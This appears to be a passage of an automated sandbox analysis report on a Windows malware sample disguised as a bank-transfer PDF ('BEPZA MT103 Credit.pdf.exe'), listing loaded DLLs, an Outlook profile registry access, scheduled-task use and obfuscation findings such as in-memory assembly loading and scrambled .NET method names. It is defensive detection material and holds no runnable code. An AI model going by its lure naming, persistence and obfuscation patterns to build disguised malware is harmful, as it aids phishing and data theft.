Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: fastprox.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: ncobjapi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mpclient.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: wmitomi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: mi.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: miutils.dll Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: BEPZA MT103 Credit.pdf.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: BEPZA MT103 Credit.pdf.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs .Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, U93FXVSN9l2hPxLFaG.cs .Net Code: xPrfnvSRvd System.Reflection.Assembly.Load(byte[])
Source: 0.2.BEPZA MT103 Credit.pdf.exe.3286090.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Source: 11.2.YEGIgzyAhkvT.exe.2f56078.0.raw.unpack, dTuvtD1DdyQbwj9dR3.cs .Net Code: CP08EDIlFp4tShm7sYs System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B6640 pushfd ; retf 0_2_077B6649
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_077B58F3 push eax; ret 0_2_077B5979
Source: C:\Users\user\Desktop\BEPZA MT103 Credit.pdf.exe Code function: 0_2_07C55F48 pushfd ; iretd 0_2_07C55F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07486640 pushfd ; retf 11_2_07486649
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485970 pushad ; ret 11_2_07485971
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07485973 push eax; ret 11_2_07485979
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 11_2_07885F48 pushfd ; iretd 11_2_07885F51
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126B3A8 push eax; iretd 16_2_0126B445
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_0126BB37 push es; iretd 16_2_0126BB44
Source: C:\Users\user\AppData\Roaming\YEGIgzyAhkvT.exe Code function: 16_2_06C09470 push es; ret 16_2_06C09480
Source: BEPZA MT103 Credit.pdf.exe Static PE information: section name: .text entropy: 7.64808870100143
Source: YEGIgzyAhkvT.exe.0.dr Static PE information: section name: .text entropy: 7.64808870100143
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, P3eh8af2o4VTkSD0Y3.cs High entropy of concatenated method names: 'Dispose', 'P3efh8a2o', 'yH8LT4C6bmLeWc8YL5', 'L4Ca6Xd2uZ8fu7tskX', 'DguxHGFPrqLRK6Jgbs', 'rGmoViKuA1CYkAIaDT', 'pSCfTfOip17KqF4YlD', 'FPnfDwDcQAmPdvY5g0', 'tTY1xtxACVStGqjdTk', 'B1WwFvRAyy9IRNc19V'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, dTuvtD1DdyQbwj9dR3.cs High entropy of concatenated method names: 'KYGvAvhTF', 'JFn7SRQet', 'ax2QgSfgc', 'g5OeQ68r3', 'a6IZjF0TE', 'UeGcOh08y', 'PKxX9EuHD', 'OcPJIHTlp', 'Ym7kCXKit', 'LsoLtyUhZ'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.7790000.4.raw.unpack, ihTFxFFnSRQetgx2gS.cs High entropy of concatenated method names: 'ISrkpyii4tSUs', 'b50WjUTaChgUDI2NEVw', 'gQERmsTu2tA2TFSBlH8', 'rFnpM5TnkllvYULeG2c', 'vcFCwhTvUgN9tUBDaUO', 'frROXdT0dSL2FIpOj8j', 'zOHiqMTZkx59a1xMwqr'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, q3XwxeHE3wtcqHlLbH.cs High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, paZWfdzUnnsDNcXHe9.cs High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, WCNuVMYuSEVTHy8bH7.cs High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, y6b8FRlSR6PSYKhFPw.cs High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, QPUYnACfL7r4DkBL9YF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, nUBjUWrYcwnrjp5cwr.cs High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, gPDJgDfUH82JajhHPO.cs High entropy of concatenated method names: 'fA8CvTHTbN', 'sjeCSUoU6V', 'pYbCLK74xT', 'G5pCtAtjcV', 'Ik4Cs9fg6b', 'kFRCjSR6PS', 'MQMhYmTMfh56qVbmhF', 'ebhyLTRtnZwbXUyRDG', 'h5rCCspKTv', 'QUVCoD4KZ1'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, wPcggfXarRGHwfdcKr.cs High entropy of concatenated method names: 'cNGDldGHbn', 'kG5D2BIY8n', 'DXjD41oP6X', 'zqnDuV3GY2', 'MPkDKqUnuC', 'TyGD0JO2uo', 'iFqDHbuvcZ', 'JbgDPdJuDx', 'VpQDANrMdk', 'dBQDZhwIIf'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cLTVWI0Z4SQaHe7mK7.cs High entropy of concatenated method names: 'o49OMsP0W6', 'q2wOG0bYG7', 'qUCOqKeDlE', 'ToString', 'SpMOreWjqu', 'vPFOwyaXa3', 'WAEphH3rae6gGSOtqaq', 'sfwHZk3Yl4o8sAEugW8', 'X5pQ3X3cR1Csdm462iN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, U93FXVSN9l2hPxLFaG.cs High entropy of concatenated method names: 'vh7ohprC21', 'pyFoJSOpYV', 'AvYoEsRkwS', 'oLLo6KDV3Q', 'QWaoNxmVPu', 'DEkoOR9Xfn', 'r4TovSu3G4', 'g3NoSq1aMH', 'OLyo8I7W8q', 'NBXoLbHp5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, HTZDqbGRORNdQopHe8.cs High entropy of concatenated method names: 'Dn55L5qPHc', 'm555t4vfsX', 'ToString', 'oFQ5JLygv7', 'krw5ENsvuB', 'FM456XlECL', 'gtj5NbcDrg', 'OqK5OGdnWV', 'dk65vrp1oW', 'qfw5STs9R3'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, hceRmTCWrN6wH7cI3N6.cs High entropy of concatenated method names: 'ToString', 'VNk9i7mtQg', 'cXG9T7AC7p', 'mXS9UBXGZR', 'WKj9lNBOkb', 'vFw92UhgK3', 'G4m94VCPT4', 'AJy9uHxK8G', 'Ymfkere5gwDXkBE2UpZ', 'DrMvCEe15sFUN7tVkfH'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, s8Y1y0Mi9WcOG0mTH1.cs High entropy of concatenated method names: 'ToString', 'Hn8jmmFnHG', 'fjGj2VT9lN', 'osFj459dNP', 'mu1juJe4fi', 'QtQjKRSaO2', 'Ycxj0Wn1nA', 'mwrjHLZEi2', 'J7VjP7bjQ4', 'gACjArprPG'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, uE5RalB2ln8b0n8Wbv.cs High entropy of concatenated method names: 'MxOR6h7bi6', 'dAmRNVqlVu', 'uhZROKdbCF', 'UdSRvBB3ch', 'W3sRD83s60', 'iGJRSHAoGN', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, cvRFX3AvwS2op08hje.cs High entropy of concatenated method names: 'tExvkeX4kZ', 'sCavg8G8oI', 'Ge3vn7OYYn', 'OARvdB0bD6', 'STSvId92KY', 'Jtcvba3Iq9', 'OYwvyjm3pp', 'X2xviv4PkG', 'hWNvT8Z7nW', 'XLMvUodxbo'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, OFmwd81ndwdfW0m9Y4.cs High entropy of concatenated method names: 'BFtsZ5kkLc', 'L5gsed5Su4', 'fAhs1iuaPx', 'tlqsVHx8t0', 'JVes2CW44d', 'O40s45t9m7', 'iEKsumsGYg', 'oGesKci1to', 'm0ds0f0VSZ', 'DgTsHaHAFp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, mjcVcEUwoMYpYuk49f.cs High entropy of concatenated method names: 'ct9NINHm7p', 'Lj0NyHDt9p', 'mT664i5LPb', 'IOP6uD7Twi', 'brA6KY2hQA', 'cdZ60weyNy', 'W5f6HvEhsk', 'yS26PWDrYQ', 'YdC6AOFA6d', 'YgF6Z0ed5O'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, Cw8mvfWKUJllqoD5N5.cs High entropy of concatenated method names: 'pYlnu46qq', 'EsbdMnlnl', 'kTmbicCx9', 'pGRyinob4', 'j4rTutCpv', 'l9bUDr4fm', 'mXMnlXDRHw2OHarK6k', 'DIit5t8Ry6hgFT2umZ', 'CJGclZ3S3', 'EiiR6Ylyy'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, IeGoKjTYbK74xTl5pA.cs High entropy of concatenated method names: 'wAn6dKQqj3', 'Huy6bk8Tv3', 'Im66i5AqpJ', 'RF86TnSoHd', 'whX6sDrdHP', 'fky6jSx93A', 'hQj654qH0t', 't0U6c0oDLL', 'QLC6DPS3jP', 'AX76RI3VLp'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.4275b90.1.raw.unpack, I7NNcAw8mv7vF81q9x.cs High entropy of concatenated method names: 'lM7Dsw39Xm', 'dvRD5BfwRv', 'EpSDDc2Ofg', 'BVfD93DDvX', 'PsKDpIFPx2', 'AZhD3cupQX', 'Dispose', 'dvjcJTnDwE', 'njQcEJ6s5H', 'Emcc6AG6s4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, q3XwxeHE3wtcqHlLbH.cs High entropy of concatenated method names: 'yTNvJijCfC', 'mhrv66gQaH', 'JjVvOpxu3J', 'WyKOB37wpy', 'ddCOzg2VyU', 'DxtvFsMdiT', 'rmLvC3uWnw', 'CTpvWRmZRq', 'jLuvo52fvs', 'JwevfhP6U8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, BhwjN4CoqiKd9WhjTAN.cs High entropy of concatenated method names: 'DbO9BqXZYX', 'J489zSNl7A', 'Ox27F4gwdL', 'px15LjeTD02oYoVfDHQ', 'pSsZE1eRb5JcUsFxFgj', 'ED1c9ke0bw0v1fiWbvS', 'Cw12FQeFgvtc5WkqQGv', 'WYmPJeeWNvMWUGUA4Z4'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, paZWfdzUnnsDNcXHe9.cs High entropy of concatenated method names: 'JrBRblIdAT', 'IkpRifCAnd', 'p1CRTYrbZ5', 'k3ZRlqpQ2a', 'jUgR25OLXe', 'gRERujaIjl', 'cMhRKL8RIf', 'e1ER3a12lH', 'a8qRkp8htH', 'aBgRgPbiaN'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, dkTFxqCCeLQYu7pD8nM.cs High entropy of concatenated method names: 'MSSRB2HDmx', 'yW2RzvPO6U', 'SoN9FLpfEM', 'pVe9CU70th', 'mAH9WTETjD', 'qMZ9oHDcqV', 'lkN9fTjLG6', 'xPo9hr1jLE', 'a7u9JIJhNt', 'DqN9E5Wj0B'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, WCNuVMYuSEVTHy8bH7.cs High entropy of concatenated method names: 'wq0QiWW9by', 'mu3QToD1Bk', 'egSQlNTIM0', 'bSMQ2FKEfc', 'u1kQuY4BqT', 'E8jQKgpmML', 'FJtQHJPFsH', 'lkWQPp98aa', 'IdqQZX41ka', 'XAPQmp9rVj'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, h7nrZ0E3lRQtVg8uOM.cs High entropy of concatenated method names: 'Dispose', 'j7vCXF81q9', 'rpJW2MIubb', 's0FLGbgUxt', 'vmwCBGrP0W', 'UomCzQhi4Y', 'ProcessDialogKey', 'PYxWFPcggf', 'WrRWCGHwfd', 'qKrWW7E5Ra'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, lTHTbNiDjeUoU6Vpd8.cs High entropy of concatenated method names: 'e27E1eAgA8', 'qhrEVcd788', 'VD5EMBYofs', 'qgiEG8fE5p', 'M9vEq7u4G6', 'UVJErOPuuE', 'G2KEweVy0s', 'EsWEaNB1k0', 'WG8EXWncnN', 'lnUEBuijKF'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, y6b8FRlSR6PSYKhFPw.cs High entropy of concatenated method names: 'TTAOh5xyRC', 'y55OEf2CUc', 'jAIONMt0Ol', 'eDOOv9970V', 'fuDOSLDTqm', 'rOTNqdJhdf', 'PgsNrsFTgj', 'BLQNwKYdZC', 'C0XNaJpXr1', 'B50NX9joOC'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, QPUYnACfL7r4DkBL9YF.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'LJi7D0ag73', 'jHx7R0PWuW', 'DZw79H6mLg', 'ftv77bogHm', 'ipM7pi1frx', 'jo17xemSM6', 'Y5Z73XARF8'
Source: 0.2.BEPZA MT103 Credit.pdf.exe.8160000.5.raw.unpack, nUBjUWrYcwnrjp5cwr.cs High entropy of concatenated method names: 'CmW5afqsQR', 'MB25B19K1t', 'BOEcFvnC3u', 'sabcCQ1UGY', 'RW15mopqJ7', 'q8y5eaP7CH', 'va95YjUDjX', 'k5O515dbPc', 'U8Q5VtT6QN', 'lTC5MplWM4'
